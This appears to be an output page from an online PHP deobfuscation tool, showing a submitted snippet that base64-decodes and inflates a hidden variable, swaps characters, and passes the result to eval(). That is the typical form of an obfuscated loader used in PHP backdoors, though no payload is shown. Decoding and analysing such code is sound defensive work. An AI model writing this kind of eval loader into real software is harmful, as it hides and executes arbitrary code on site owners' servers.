Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$nav = gzinflate(base64_decode($SISTEMIT_COM_ENC)); $str = ['','','','','','','','',''..

Decoded Output download

<?  $nav = gzinflate(base64_decode($SISTEMIT_COM_ENC)); 
			$str = ['','','','','','','','','','','']; 
			$rplc =['a','i','u','e','o','d','s','h','v','t',' ']; 
		    $nav = str_replace($str,$rplc,$nav); 
			eval($nav); ?>

Did this file decode correctly?

Original Code

$nav = gzinflate(base64_decode($SISTEMIT_COM_ENC));
			$str = ['','','','','','','','','','',''];
			$rplc =['a','i','u','e','o','d','s','h','v','t',' '];
		    $nav = str_replace($str,$rplc,$nav);
			eval($nav);

Function Calls

None

Variables

None

Stats

MD5 9dc6fcef068d3a9c12c078e382d8e484
Eval Count 0
Decode Time 97 ms